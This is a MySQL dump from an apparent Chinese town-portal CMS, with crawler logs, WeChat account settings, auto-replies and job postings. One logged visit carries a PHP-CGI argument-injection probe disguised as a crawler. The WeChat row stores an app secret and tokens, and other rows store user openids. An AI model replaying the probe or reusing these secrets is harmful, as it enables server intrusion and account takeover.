INSERT INTO `ey_weapp_spider_visit` VALUES ('98163', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.108', '1662070462', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98164', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/xianyang.html', '114.119.151.155', '1662070568', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98165', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/497.html', '66.249.79.112', '1662070629', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98166', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.91', '1662070908', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98172', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/473.html', '66.249.79.108', '1662073692', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98174', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/109.html', '66.249.79.108', '1662074093', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98175', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '118.184.177.92', '1662074213', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98177', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.110', '1662074554', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98181', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/473.html', '66.249.79.110', '1662075415', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98184', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '//?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input', '209.141.57.123', '1662075611', '0');
-- -----------------------------
-- Table structure for `ey_weapp_usersconcern`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_usersconcern`;
CREATE TABLE `ey_weapp_usersconcern` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT NULL,
`cn_users_id` int(10) DEFAULT NULL,
`lang` varchar(50) DEFAULT '' COMMENT '语言标识',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=已关注,0=未关注)',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_userszuji`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_userszuji`;
CREATE TABLE `ey_weapp_userszuji` (
`zuji_id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT NULL,
`at_users_id` int(10) DEFAULT NULL,
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`zuji_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_workorder`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_workorder`;
CREATE TABLE `ey_weapp_workorder` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(50) DEFAULT '' COMMENT '工单标题',
`users_id` int(10) DEFAULT NULL COMMENT '提交工单用户id',
`leixing` varchar(100) DEFAULT '' COMMENT '工单类型',
`litpic` varchar(255) DEFAULT '' COMMENT '截图',
`intro` text COMMENT '工单描述',
`adminintro` text COMMENT '管理员回复',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=已经处理,0=未处理)',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_workorder_ask`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_workorder_ask`;
CREATE TABLE `ey_weapp_workorder_ask` (
`ask_id` int(11) NOT NULL AUTO_INCREMENT,
`ask` varchar(80) NOT NULL DEFAULT '' COMMENT '问题类型',
`sort_order` int(11) DEFAULT '0' COMMENT '排序号',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`ask_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_workorder_ask`
-- -----------------------------
INSERT INTO `ey_weapp_workorder_ask` VALUES ('1', '售前服务', '0', '1524975826', '1537585074');
INSERT INTO `ey_weapp_workorder_ask` VALUES ('2', '售后服务', '1', '1524976095', '1537585061');
-- -----------------------------
-- Table structure for `ey_weapp_wx_config`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_config`;
CREATE TABLE `ey_weapp_wx_config` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`wxname` varchar(60) DEFAULT '' COMMENT '公众号名称',
`apiurl` varchar(500) DEFAULT '' COMMENT '服务器地址(URL)',
`appid` varchar(50) DEFAULT '' COMMENT 'appid',
`appsecret` varchar(50) DEFAULT '' COMMENT 'appsecret',
`wxid` varchar(64) DEFAULT '' COMMENT '公众号原始ID',
`weixin` char(64) DEFAULT '' COMMENT '微信号',
`headerpic` char(255) DEFAULT '' COMMENT '头像地址',
`token` int(255) DEFAULT '0' COMMENT 'token',
`w_token` varchar(150) DEFAULT '' COMMENT '微信对接token',
`type` tinyint(1) DEFAULT '0' COMMENT '微信号类型',
`web_access_token` varchar(200) DEFAULT '' COMMENT ' 网页授权token',
`web_refresh_token` varchar(200) DEFAULT '' COMMENT 'web_refresh_token',
`web_expires_in` int(11) DEFAULT '0' COMMENT 'access_token有效期(秒)',
`web_expires` int(11) DEFAULT '0' COMMENT '过期时间',
`qr` varchar(200) DEFAULT '' COMMENT '二维码',
`wait_access` tinyint(1) DEFAULT '1' COMMENT '微信接入状态,0待接入1已接入',
`add_time` int(11) DEFAULT '0' COMMENT 'create_time',
`update_time` int(11) DEFAULT '0' COMMENT 'updatetime',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='微信公众账号表';
-- -----------------------------
-- Records of `ey_weapp_wx_config`
-- -----------------------------
INSERT INTO `ey_weapp_wx_config` VALUES ('1', '龙凤之窗', 'https://gm.scvip.net.cn/index.php?s=/plugins/Wechat/valid/ctl/Basis/appid/wx3e8e7f3936af132e', 'wx3e8e7f3936af132e', '534a82f28499032a107959facd2c4106', '', 'lfzgov', '', '1665716329', 'w5hKa8ETmEiMwNSQEDk9kAMqTFJuCKHv', '2', '62_ozivmvhn00lvNrk_w0a1l7V7u3FRwu-iav1STGlLpinlar8u0Vk1WkZCPytsyuEnui8g7arpf2-unDlOjoHKTXjlfW6L6e1AaCIZwpCmE-vOigm6IpEn-FI8W44UjuPA9XrC5BEMGFOI2gc6MAXgADAPDA', '', '7000', '1667381641', '', '1', '1665716329', '1667374641');
-- -----------------------------
-- Table structure for `ey_weapp_wx_img`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_img`;
CREATE TABLE `ey_weapp_wx_img` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`keyword` varchar(100) NOT NULL COMMENT '关键词',
`intro` text COMMENT '简介',
`litpic` varchar(255) DEFAULT '' COMMENT '封面图片',
`media_id` varchar(255) DEFAULT '' COMMENT '素材ID',
`wx_img_url` varchar(500) DEFAULT '' COMMENT '官方返回的素材url(图片只能在腾讯系域名内使用,否则图片将被屏蔽)',
`thumb_media_id` varchar(255) DEFAULT '' COMMENT '缩略图的media_id',
`thumb_wx_img_url` varchar(500) DEFAULT '' COMMENT '官方返回的缩略图素材url(图片只能在腾讯系域名内使用,否则图片将被屏蔽)',
`url` varchar(255) DEFAULT '' COMMENT '图文外链地址',
`title` varchar(100) DEFAULT '' COMMENT '标题',
`aid` int(11) DEFAULT '0' COMMENT '站内文档ID',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `token` (`token`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='微信单图文回复表';
-- -----------------------------
-- Records of `ey_weapp_wx_img`
-- -----------------------------
INSERT INTO `ey_weapp_wx_img` VALUES ('1', '新闻动态', '新闻动态', '/uploads/weapp/20221014/ded7e0949380da283962948f61966d89.jpg', '', '', '1Sp0bCOWuNdEmqPUpRvO41Gk7i4kCHsD1iHZ33jlVsiERwGlwjqVWS3D9NgOlVvf', 'http://mmbiz.qpic.cn/mmbiz_jpg/8iacSTB6PcVwcujp7NQ0GNHyPrmemUsShT6rM733UXlI2QAiaV40e8eYqp3JgcgpMpkkArRWhXibxBJ7YOuXTOvmw/0?wx_fmt=jpeg', 'https://gm.scvip.net.cn/html/xinwendongtai/', '新闻动态', '0', '1665716329', '1665717839', '1665717839');
INSERT INTO `ey_weapp_wx_img` VALUES ('4', '新闻', '为积极有效应对新冠肺炎疫情,进一步阻击新冠肺炎病毒传播。10月14日,龙凤镇全面部署、精心组织,高效有序开展核酸检测工作。 快速响应,精准施策。在接到市疫情防控指挥部关于开展全员核酸检测的通知后,龙凤镇快速响应,镇、村...', '/uploads/weapp/20221014/c029c597ad95c7f2d760d91f421b4d98.jpg', '', '', '1Sp0bCOWuNdEmqPUpRvO4yqbCkiYn0wRz-xAz06O4b1e15M844_BGBNbgxwF2QJR', 'http://mmbiz.qpic.cn/mmbiz_jpg/8iacSTB6PcVwcujp7NQ0GNHyPrmemUsShbUC4b0vsjf5HYoOaKBaJ9YXXSorhnVx8Yhibdn38zRAwJmWlZXWXaVA/0?wx_fmt=jpeg', 'https://gm.scvip.net.cn/html/xinwendongtai/zhenyuxinwen/60.html', '龙凤镇有序开展全员核酸检测工作', '0', '1665716329', '1665727291', '1665727291');
INSERT INTO `ey_weapp_wx_img` VALUES ('5', '核酸', '为积极有效应对新冠肺炎疫情,进一步阻击新冠肺炎病毒传播。10月14日,龙凤镇全面部署、精心组织,高效有序开展核酸检测工作。 快速响应,精准施策。在接到市疫情防控指挥部关于开展全员核酸检测的通知后,龙凤镇快速响应,镇、村...', '/uploads/remote/2022/10/14/634916356dd73.jpg', '', '', '1Sp0bCOWuNdEmqPUpRvO4395fiA5E6ST9aJh18iNdRlEztORA0qifXrdorFw_JG9', 'http://mmbiz.qpic.cn/mmbiz_jpg/8iacSTB6PcVwcujp7NQ0GNHyPrmemUsShbUC4b0vsjf5HYoOaKBaJ9YXXSorhnVx8Yhibdn38zRAwJmWlZXWXaVA/0?wx_fmt=jpeg', 'http://gm.scvip.net.cn/lfzadmin.php?m=home&c=View&a=index&aid=60', '龙凤镇有序开展全员核酸检测工作', '60', '1665716329', '1665734198', '1665734198');
INSERT INTO `ey_weapp_wx_img` VALUES ('6', '核酸检测', '关于开展全员核酸检测的通知', '/uploads/weapp/20221014/8dacc15b69966ad7f5634e8b1f54696a.png', '', '', '1Sp0bCOWuNdEmqPUpRvO43TG8CTBOrXJUpdAhwEymzEoyyMewt1i_VtGisFVv91o', 'http://mmbiz.qpic.cn/mmbiz_png/8iacSTB6PcVwcujp7NQ0GNHyPrmemUsShnsCOiahzE2fdfHFhk5mlFI3YunY6OIDENVicam4ajMQtL3ibyV3mqZ5pw/0?wx_fmt=png', 'https://gm.scvip.net.cn/html/xinwendongtai/zhenyuxinwen/70.html', '关于开展全员核酸检测的通知', '0', '1665716329', '1665762671', '1665762671');
-- -----------------------------
-- Table structure for `ey_weapp_wx_keyword`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_keyword`;
CREATE TABLE `ey_weapp_wx_keyword` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`keyword` varchar(100) DEFAULT '' COMMENT '关键字',
`pid` int(11) DEFAULT NULL COMMENT '对应表ID',
`type` varchar(30) DEFAULT 'TEXT' COMMENT '关键词操作类型',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `pid` (`pid`) USING BTREE,
KEY `token` (`token`,`type`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COMMENT='微信回复关键字主表';
-- -----------------------------
-- Records of `ey_weapp_wx_keyword`
-- -----------------------------
INSERT INTO `ey_weapp_wx_keyword` VALUES ('1', '你好', '1', 'TEXT', '1665716329', '1665717395', '1665717431');
INSERT INTO `ey_weapp_wx_keyword` VALUES ('2', '联系方式', '2', 'TEXT', '1665716329', '1665717655', '1665799312');
INSERT INTO `ey_weapp_wx_keyword` VALUES ('3', '新闻动态', '1', 'IMG', '1665716329', '1665717839', '1665717839');
INSERT INTO `ey_weapp_wx_keyword` VALUES ('6', '新闻', '4', 'IMG', '1665716329', '1665727291', '1665727291');
INSERT INTO `ey_weapp_wx_keyword` VALUES ('7', '核酸', '5', 'IMG', '1665716329', '1665734198', '1665734198');
INSERT INTO `ey_weapp_wx_keyword` VALUES ('8', '核酸检测', '6', 'IMG', '1665716329', '1665762671', '1665762671');
-- -----------------------------
-- Table structure for `ey_weapp_wx_menu`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_menu`;
CREATE TABLE `ey_weapp_wx_menu` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT 'id',
`level` tinyint(1) DEFAULT '1' COMMENT '菜单级别',
`name` varchar(50) NOT NULL DEFAULT '' COMMENT 'name',
`sort_order` int(5) DEFAULT '0' COMMENT '排序',
`type` varchar(20) DEFAULT '' COMMENT '0 view 1 click',
`value` varchar(255) DEFAULT NULL COMMENT 'value',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`pid` int(11) DEFAULT '0' COMMENT '上级菜单',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `token` (`token`,`pid`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='微信自定义菜单表';
-- -----------------------------
-- Records of `ey_weapp_wx_menu`
-- -----------------------------
INSERT INTO `ey_weapp_wx_menu` VALUES ('1', '1', '新闻动态', '0', 'view', 'https://gm.scvip.net.cn/html/xinwendongtai/', '1665716329', '0', '1665716395', '1665733969');
INSERT INTO `ey_weapp_wx_menu` VALUES ('2', '1', '交流中心', '0', 'view', 'https://gm.scvip.net.cn/index.php/ask.html', '1665716329', '0', '1665716430', '1665733969');
INSERT INTO `ey_weapp_wx_menu` VALUES ('3', '1', '关于我们', '0', 'view', 'https://gm.scvip.net.cn/index.html', '1665716329', '0', '1665716472', '1665733969');
-- -----------------------------
-- Table structure for `ey_weapp_wx_news`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_news`;
CREATE TABLE `ey_weapp_wx_news` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`keyword` varchar(100) NOT NULL DEFAULT '' COMMENT '关键字',
`img_id` varchar(50) DEFAULT '' COMMENT '图文组合id',
`msg_id` varchar(50) DEFAULT '' COMMENT '群发的消息ID',
`errcode` varchar(20) DEFAULT '' COMMENT '错误码',
`is_del` tinyint(1) DEFAULT '0' COMMENT '撤销:1=是,0=否',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `token` (`token`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信组合图文回复表';
-- -----------------------------
-- Table structure for `ey_weapp_wx_pic`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_pic`;
CREATE TABLE `ey_weapp_wx_pic` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`keyword` varchar(100) DEFAULT '' COMMENT '关键词',
`title` varchar(255) DEFAULT '',
`media_id` varchar(255) DEFAULT '' COMMENT '素材ID',
`litpic` varchar(255) DEFAULT '' COMMENT '上传图片',
`wx_img_url` varchar(500) DEFAULT '' COMMENT '官方返回的素材url(图片只能在腾讯系域名内使用,否则图片将被屏蔽)',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `token` (`token`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信图片回复表';
-- -----------------------------
-- Table structure for `ey_weapp_wx_subscribe`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_subscribe`;
CREATE TABLE `ey_weapp_wx_subscribe` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`media_id` varchar(255) DEFAULT '' COMMENT '素材ID',
`litpic` varchar(255) DEFAULT '' COMMENT '上传图片',
`wx_img_url` varchar(500) DEFAULT '' COMMENT '官方返回的素材url(图片只能在腾讯系域名内使用,否则图片将被屏蔽)',
`text` text COMMENT '回复内容',
`type` varchar(30) DEFAULT 'TEXT' COMMENT '关键词操作类型',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `token` (`token`,`type`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='微信被关注回复表';
-- -----------------------------
-- Records of `ey_weapp_wx_subscribe`
-- -----------------------------
INSERT INTO `ey_weapp_wx_subscribe` VALUES ('1', '', '', '', '感谢你关注龙凤人自己的交流平台 @lfzgov 龙凤之窗\r\n更欢迎你与我们互动沟通交流。\r\n\r\n===========================\r\n更多联系方式\r\n请微信搜索 魅力龙凤 访问我们微信小程序\r\nAAP(安卓版)下载地址:https://gm.scvip.net.cn/lfzxxw.apk,请复制到浏览器打开。\r\n官网:https://gm.scvip.net.cn\r\n电话:0816-3430266', 'TEXT', '1665716329', '1665799156', '1665799319');
-- -----------------------------
-- Table structure for `ey_weapp_wx_text`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wx_text`;
CREATE TABLE `ey_weapp_wx_text` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '表id',
`keyword` varchar(100) DEFAULT '' COMMENT '关键字',
`text` text COMMENT 'text',
`token` int(11) NOT NULL DEFAULT '0' COMMENT '公众号唯一标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`),
KEY `token` (`token`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='微信文本回复表';
-- -----------------------------
-- Records of `ey_weapp_wx_text`
-- -----------------------------
INSERT INTO `ey_weapp_wx_text` VALUES ('1', '你好', '我很好,你也要很好,终于等到你。欢迎关注《龙凤之窗》公众号@lfzgov', '1665716329', '1665717395', '1665717431');
INSERT INTO `ey_weapp_wx_text` VALUES ('2', '联系方式', '感谢你关注龙凤人自己的交流平台 @lfzgov 龙凤之窗\r\n更欢迎你与我们互动沟通交流。\r\n\r\n===========================\r\n更多联系方式\r\n请微信搜索 魅力龙凤 访问我们微信小程序\r\nAAP(安卓版)下载地址:https://gm.scvip.net.cn/lfzxxw.apk,请复制到浏览器打开。\r\n官网:https://gm.scvip.net.cn\r\n电话:0816-3430266', '1665716329', '1665717655', '1665799312');
-- -----------------------------
-- Table structure for `ey_weapp_wxlogin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_wxlogin`;
CREATE TABLE `ey_weapp_wxlogin` (
`wxuser_id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(11) NOT NULL DEFAULT '0' COMMENT '用户id',
`openid` varchar(50) NOT NULL DEFAULT '' COMMENT 'openid',
`nickname` varchar(100) NOT NULL DEFAULT '' COMMENT '微信昵称',
`unionid` varchar(200) NOT NULL DEFAULT '' COMMENT 'unionid',
`headimgurl` varchar(200) NOT NULL DEFAULT '' COMMENT '头像',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
`sta` tinyint(1) NOT NULL DEFAULT '0' COMMENT '标识',
PRIMARY KEY (`wxuser_id`) USING BTREE,
KEY `openid` (`openid`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_wxlogin`
-- -----------------------------
INSERT INTO `ey_weapp_wxlogin` VALUES ('1', '19', 'oNBv56TWQ3J-Fkk4C6nHLdVnt5bE', '流笛', 'owjT55_Ot0DKxEAWMNr5CyQdAzwc', 'https://thirdwx.qlogo.cn/mmopen/vi_32/HZMBTevbmk16K3Bj05sR0lbNJSibeicOAnhlopkdudCHUxgAocOcB4z0X3HgvzgSYq8tgz1oKgXcCY2QCgw5EY4g/132', '1665967839', '1665967839', '0');
INSERT INTO `ey_weapp_wxlogin` VALUES ('2', '0', 'oNBv56TENQlL7AY1tOGR3QNMGo0I', 'Jessica', 'owjT554eBKHq8Ib5aIlkVQHDwQS8', 'https://thirdwx.qlogo.cn/mmopen/vi_32/pGYZKIo2bhYRlhGhKA36PiaoFOlFvy6tk9KicBoK3QUD1FJqicrsKZaic0uw4BfrMUtpCm2Uz8WPicLqC2QOWdUNNJQ/132', '1666579476', '0', '0');
-- -----------------------------
-- Table structure for `ey_wx_users`
-- -----------------------------
DROP TABLE IF EXISTS `ey_wx_users`;
CREATE TABLE `ey_wx_users` (
`wxuser_id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(11) NOT NULL DEFAULT '0' COMMENT '用户id',
`openid` varchar(100) NOT NULL DEFAULT '' COMMENT 'openid',
`unionid` varchar(100) DEFAULT '' COMMENT 'unionid',
`nickname` varchar(100) NOT NULL DEFAULT '' COMMENT '微信昵称',
`headimgurl` varchar(200) NOT NULL DEFAULT '' COMMENT '头像',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`wxuser_id`),
KEY `openid` (`openid`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='微信小程序用户表';
-- -----------------------------
-- Table structure for `ey_ygmx_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_ygmx_content`;
CREATE TABLE `ey_ygmx_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`zc` varchar(200) NOT NULL DEFAULT '' COMMENT '职称',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_ygmx_content`
-- -----------------------------
INSERT INTO `ey_ygmx_content` VALUES ('1', '12', '1621334700', '1621334700', '三级技术研发人员');
INSERT INTO `ey_ygmx_content` VALUES ('2', '13', '1621334729', '1621334729', '一级技术研发人员');
INSERT INTO `ey_ygmx_content` VALUES ('3', '14', '1621334745', '1621334745', '一级技术研发人员');
INSERT INTO `ey_ygmx_content` VALUES ('4', '15', '1621334766', '1621334766', '二级技术研发人员');
-- -----------------------------
-- Table structure for `ey_zaopin_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_zaopin_content`;
CREATE TABLE `ey_zaopin_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`yaoqiu` varchar(200) NOT NULL DEFAULT '' COMMENT '要求',
`gznr` longtext COMMENT '工作内容',
`gongxin` varchar(200) NOT NULL DEFAULT '' COMMENT '工薪',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_zaopin_content`
-- -----------------------------
INSERT INTO `ey_zaopin_content` VALUES ('1', '38', '1621473850', '1621473850', '经验3-4年 / 大专', '<p>岗位职责:</p><p>1、挖掘当地预付货市场,搜集当地市场信息;</p><p>2、开发并维护货代同行,做好业务的报价、揽取和跟踪;</p><p>3、根据公司战略和销售目标完成销售任务;</p><p>4、协助财务把与客户达成的各项交易款项收回公司,做好工作流程的预防与控制工作。</p><p>任职要求:</p><p>1、大专及以上学历;</p><p>2、有美加线且三年以上开发经验,有一定的客户资源和人脉者优先;</p><p>3、沟通能力强,吃苦耐劳有韧性;</p><p>4、优秀的执行力及自律性。</p><p><br/></p>', '4.5-6K');
INSERT INTO `ey_zaopin_content` VALUES ('2', '39', '1621473969', '1621473969', '经验2年 / 大专', '<p>岗位职责:</p><p>1. 根据公司发展规划及产品定位,从客户的需求角度出发,深度挖掘现有产品卖点,制作海报/ 文案/ 视频/ 动图等将优点充分展示,提升核心竞争力;</p><p>2. 撰写和优化不同销售渠道/平台的 产品内容介绍(主要文字性内容,软文,事件营销等等), 吸引潜在客户的注意力;</p><p>3. 分析国内沿海主要口岸城市的FBA物流市场竞争特点,和产品差异化竞争策略,并按深圳统筹指示,为上海/宁波/青岛站点推广FBA物流服务制作营销材料;</p><p>4. 管理并按要求定期更新,维护公司官网、微信公众号等对外宣传平台;</p><p>5, 联系协调相关合作单位,协助策划和实施公司的线上品牌宣传工作(如各类促销引流),线下各类现场活动(如展会,沙龙论坛),总结评估活动效果并持续改进;</p><p>6. 定期关注了解竞争对手,市场趋势,需求转化收集;并及时提出有效的推广策略方案和测算成本,全面提升公司及产品之品牌知名度;</p><p>7. 完成领导交办的其它相关工作。</p><p><br/></p><p>任职要求:</p><p>1: 熟练使用Photoshop、Coreldraw、AI 等设计软件, 熟悉P图工具, 熟练使用MS日常办公软件(Word、Excel、PPT),</p><p>2:有较强的文字功底,能将文案创意与图片视频等工具结合起来,精准传达到位;</p><p>3: 熟悉口碑/生态圈营销、论坛营销等各类网络营销方法,具体较为敏锐的新闻热点捕捉能力;</p><p>4:专科及以上学历,美术/ 动画设计/ 计算机设计专业优先;次之市场营销、广告策划专业且有上述专业技能优先;</p><p>5:跨界学习能力强;有较强的沟通表达能力和协调能力;较强的抗压能力和时间管理能力;</p><p><br/></p>', '5-7k');
INSERT INTO `ey_zaopin_content` VALUES ('3', '40', '1621474004', '1621474004', '经验2年 / 大专', '<p>岗位职责:</p><p>1、根据销售/客服提供的客户委托书联系安排客户出货事宜</p><p>2、根据船卡要求安排订舱</p><p>3、安排客户做箱报关计划并通知车队与报关行</p><p>4、文件制作:提单制作/AMS.ACI发送/ISF发送</p><p>5、费用账单制作及发送</p><p>6、确认付款后签发派送提单给客户</p><p>7、保持与客户/销售/商务各窗口的及时操作信息沟通</p><p>8、根据系统要求规范完成操作各项工作</p><p>9、及时与上级沟通操作中遇到的问题以便上级落实应对措施</p><p>10、完成上级交办的其他相关工作</p><p><br/></p><p>岗位要求:</p><p>1、专科以上学历,大学英语四级;</p><p>2、具有2年以上美加线或欧地线工作经验,熟悉各种形式的出口操作流程,包括指定货/自揽货,能独立完成操作、一票到底、能及时迅速的处理突发事件;</p><p>3、工作态度积极,品行端正,细心认真,条理清楚,责任心强,有一定抗压能力及较强的沟通协调能力,并具有有良好的客户维护意识,工作稳定性高,善于学习新的事物,愿与公司共同发展。</p><p><br/></p><p microsoft="" font-size:="" white-space:="" background-color:=""><br/></p>', '5-7K');
-- -----------------------------
-- Table structure for `ey_zpmx_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_zpmx_content`;
CREATE TABLE `ey_zpmx_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`zwms` longtext COMMENT '职位描述',
`rzyq` longtext COMMENT '入职要求',
